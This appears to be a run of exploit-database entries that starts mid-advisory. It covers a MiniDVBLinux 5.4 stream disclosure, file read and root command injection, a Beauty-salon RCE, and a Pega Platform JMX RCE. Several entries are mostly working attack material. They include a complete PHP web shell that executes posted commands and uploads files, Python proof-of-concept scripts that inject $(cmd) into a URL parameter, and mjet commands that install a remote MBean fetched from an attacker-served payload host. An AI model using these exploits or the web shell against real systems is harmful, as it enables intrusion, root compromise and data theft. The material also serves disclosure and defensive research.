recordings, Time Shift, DVD and MP3 Replay, Setup and configuration
via browser, and a lot more. MLD strives to be as small as possible,
modular, simple. It supports numerous hardware platforms, like classic
desktops in 32/64bit and also various low power ARM systems.
Desc: The application suffers from an unauthenticated live stream
disclosure when /tpl/tv_action.sh is called and generates a snapshot
in /var/www/images/tv.jpg through the Simple VDR Protocol (SVDRP).
--------------------------------------------------------------------
/var/www/tpl/tv_action.sh:
--------------------------
01: #!/bin/sh
02:
03: header
04:
05: quality=60
06: svdrpsend.sh "GRAB /tmp/tv.jpg $quality $(echo "$query" | sed "s/width=\(.*\)&height=\(.*\)/\1 \2/g")"
07: mv -f /tmp/tv.jpg /var/www/images 2>/dev/null
--------------------------------------------------------------------
Tested on: MiniDVBLinux 5.4
BusyBox v1.25.1
Architecture: armhf, armhf-rpi2
GNU/Linux 4.19.127.203 (armv7l)
VideoDiskRecorder 2.4.6
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2022-5716
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5716.php
24.09.2022
--
1. Generate screengrab:
- Request: curl http://ip:8008/tpl/tv_action.sh -H "Accept: */*"
- Response:
220 mld SVDRP VideoDiskRecorder 2.4.6; Mon Sep 12 00:44:10 2022; UTF-8
250 Grabbed image /tmp/tv.jpg 60
221 mld closing connection
2. View screengrab:
- Request: curl http://ip:8008/images/tv.jpg
3. Or use a browser:
- http://ip:8008/home?site=remotecontrol
## Exploit Title: Beauty-salon v1.0 - Remote Code Execution (RCE)
## Exploit Author: nu11secur1ty
## Date: 10.12.2022
## Vendor: https://code4berry.com/projects/beautysalon.php
## Software: https://code4berry.com/project%20downloads/beautysalon_download.php
## Reference: https://github.com/nu11secur1ty/NVE/blob/NVE-master/2022/NVE-2022-1012.txt
## Description:
The parameter `userimage` from Beauty-salon-2022 suffers from Web
Shell-File Upload - RCE.
NOTE: The user permissions of this system are not working correctly, and
the function is not sanitizing well.
The attacker can use an already created account from someone who controls
this system and he can upload a very malicious file by using this
vulnerability,
or more precisely (no sanitizing of function for edit image), for whatever
account, then he can execute it from anywhere on the external network.
Status: HIGH Vulnerability
[+] Exploit:
```php
<!-- Project Name : PHP Web Shell -->
<!-- Version : 4.0 nu11secur1ty -->
<!-- First development date : 2022/10/05 -->
<!-- This Version development date : 2022/10/05 -->
<!-- Moded and working with PHP 8 : 2022/10/05 -->
<!-- language : html, css, javascript, php -->
<!-- Developer : nu11secur1ty -->
<!-- Web site : https://www.nu11secur1ty.com/ -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "
http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html" charset="euc-kr">
<title>PHP Web Shell Ver 4.0 by nu11secur1ty</title>
<script type="text/javascript">
function FocusIn(obj)
{
if(obj.value == obj.defaultValue)
obj.value = '';
}
function FocusOut(obj)
{
if(obj.value == '')
obj.value = obj.defaultValue;
}
</script>
</head>
<body>
<b>WebShell's Location = http://<?php echo $_SERVER['HTTP_HOST']; echo
$_SERVER['REQUEST_URI'] ?></b><br><br>
HTTP_HOST = <?php echo $_SERVER['HTTP_HOST'] ?><br>
REQUEST_URI = <?php echo $_SERVER['REQUEST_URI'] ?><br>
<br>
<form name="cmd_exec" method="post" action="http://<?php echo
$_SERVER['HTTP_HOST']; echo $_SERVER['REQUEST_URI'] ?>">
<input type="text" name="cmd" size="70" maxlength="500" value="Input
command to execute" onfocus="FocusIn(document.cmd_exec.cmd)"
onblur="FocusOut(document.cmd_exec.cmd)">
<input type="submit" name="exec" value="exec">
</form>
<?php
if(isset($_POST['exec']))
{
exec($_POST['cmd'],$result);
echo '----------------- < OutPut > -----------------';
echo '<pre>';
foreach($result as $print)
{
$print = str_replace('<','<',$print);
echo $print . '<br>';
}
echo '</pre>';
}
else echo '<br>';
?>
<form enctype="multipart/form-data" name="file_upload" method="post"
action="http://<?php echo $_SERVER['HTTP_HOST']; echo
$_SERVER['REQUEST_URI'] ?>">
<input type="file" name="file">
<input type="submit" name="upload" value="upload"><br>
<input type="text" name="target" size="100" value="Location where file will
be uploaded (include file name!)"
onfocus="FocusIn(document.file_upload.target)"
onblur="FocusOut(document.file_upload.target)">
</form>
<?php
if(isset($_POST['upload']))
{
$check = move_uploaded_file($_FILES['file']['tmp_name'], $_POST['target']);
if($check == TRUE)
echo '<pre>The file was uploaded successfully!!</pre>';
else
echo '<pre>File Upload was failed...</pre>';
}
?>
</body>
</html>
```
# Proof and Exploit:
[href](https://streamable.com/ewdmoh)
# m0e3:
[href](
https://www.nu11secur1ty.com/2022/10/beauty-salon-2022-web-shell-file-upload.html
)
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
# Exploit Title: Pega Platform 8.1.0 - Remote Code Execution (RCE)
# Google Dork: N/A
# Date: 20 Oct 2022
# Exploit Author: Marcin Wolak (using MOGWAI LABS JMX Exploitation Toolkit)
# Vendor Homepage: www.pega.com
# Software Link: Not Available
# Version: 8.1.0 on-premise and higher, up to 8.3.7
# Tested on: Red Hat Enterprise 7
# CVE : CVE-2022-24082
;Dumping RMI registry:
nmap -sT -sV --script rmi-dumpregistry -p 9999 <IP Address>
;Extracting dynamic TCP port number from the dump (in form of @127.0.0.1
:<PORT>)
;Verifying that the <PORT> is indeed open (it gives 127.0.0.1 in the RMI
dump, but actually listens on the network as well):
nmap -sT -sV -p <PORT> <IP Address>
;Exploitation requires:
;- JVM
;- MOGWAI LABS JMX Exploitation Toolkit (https://github.com/mogwailabs/mjet)
;- jython
;Installing mbean for remote code execution
java -jar jython-standalone-2.7.2.jar mjet.py --localhost_bypass <PORT> <IP
Address> 9999 install random_password http://<Local IP to Serve Payload
over HTTP>:6666 6666
;Execution of commands id & ifconfig
java -jar jython-standalone-2.7.2.jar mjet.py --localhost_bypass <PORT> <IP
Address> 9999 command random_password "id;ifconfig"
;More details:
https://medium.com/@Marcin-Wolak/cve-2022-24082-rce-in-the-pega-platform-discovery-remediation-technical-details-long-live-69efb5437316
Kind Regards,
Marcin Wolak
# Exploit Title: MiniDVBLinux 5.4 - Arbitrary File Read
# Exploit Author: LiquidWorm
#!/usr/bin/env python3
#
#
# MiniDVBLinux 5.4 Arbitrary File Read Vulnerability
#
#
# Vendor: MiniDVBLinux
# Product web page: https://www.minidvblinux.de
# Affected version: <=5.4
#
# Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple
# way to convert a standard PC into a Multi Media Centre based on the
# Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this
# Linux based Digital Video Recorder: Watch TV, Timer controlled
# recordings, Time Shift, DVD and MP3 Replay, Setup and configuration
# via browser, and a lot more. MLD strives to be as small as possible,
# modular, simple. It supports numerous hardware platforms, like classic
# desktops in 32/64bit and also various low power ARM systems.
#
# Desc: The distribution suffers from an arbitrary file disclosure
# vulnerability. Using the 'file' GET parameter attackers can disclose
# arbitrary files on the affected device and disclose sensitive and system
# information.
#
# Tested on: MiniDVBLinux 5.4
# BusyBox v1.25.1
# Architecture: armhf, armhf-rpi2
# GNU/Linux 4.19.127.203 (armv7l)
# VideoDiskRecorder 2.4.6
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2022-5719
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5719.php
#
#
# 24.09.2022
#
import requests
import re,sys
#test case 001
#http://ip:8008/?site=about&name=MLD%20about&file=/boot/ABOUT
if len(sys.argv) < 3:
print('MiniDVBLinux 5.4 File Disclosure PoC')
print('Usage: ./mldhd_fd.py [url] [file]')
sys.exit(17)
else:
url = sys.argv[1]
fil = sys.argv[2]
req = requests.get(url+'/?site=about&name=ZSL&file='+fil)
outz = re.search('<pre>(.*?)</pre>',req.text,flags=re.S).group()
print(outz.replace('<pre>','').replace('</pre>',''))
# Exploit Title: MiniDVBLinux 5.4 - Remote Root Command Injection
# Exploit Author: LiquidWorm
#!/usr/bin/env python3
#
#
# MiniDVBLinux 5.4 Remote Root Command Injection Vulnerability
#
#
# Vendor: MiniDVBLinux
# Product web page: https://www.minidvblinux.de
# Affected version: <=5.4
#
# Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple
# way to convert a standard PC into a Multi Media Centre based on the
# Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this
# Linux based Digital Video Recorder: Watch TV, Timer controlled
# recordings, Time Shift, DVD and MP3 Replay, Setup and configuration
# via browser, and a lot more. MLD strives to be as small as possible,
# modular, simple. It supports numerous hardware platforms, like classic
# desktops in 32/64bit and also various low power ARM systems.
#
# Desc: The application suffers from an OS command injection vulnerability.
# This can be exploited to execute arbitrary commands with root privileges.
#
# Tested on: MiniDVBLinux 5.4
# BusyBox v1.25.1
# Architecture: armhf, armhf-rpi2
# GNU/Linux 4.19.127.203 (armv7l)
# VideoDiskRecorder 2.4.6
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2022-5717
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5717.php
#
#
# 24.09.2022
#
import requests
import re,sys
#test case 001
#http://ip:8008/?site=about&name=MLD%20about&file=/boot/ABOUT
#test case 004
#http://ip:8008/?site=about&name=blind&file=$(id)
#cat: can't open 'uid=0(root)': No such file or directory
#cat: can't open 'gid=0(root)': No such file or directory
#test case 005
#http://ip:8008/?site=about&name=blind&file=`id`
#cat: can't open 'uid=0(root)': No such file or directory
#cat: can't open 'gid=0(root)': No such file or directory
if len(sys.argv) < 3:
print('MiniDVBLinux 5.4 Command Injection PoC')
print('Usage: ./mldhd_root2.py [url] [cmd]')
sys.exit(17)
else:
url = sys.argv[1]
cmd = sys.argv[2]
req = requests.get(url+'/?site=about&name=ZSL&file=$('+cmd+')')
outz = re.search('<pre>(.*?)</pre>',req.text,flags=re.S).group()
print(outz.replace('<pre>','').replace('</pre>',''))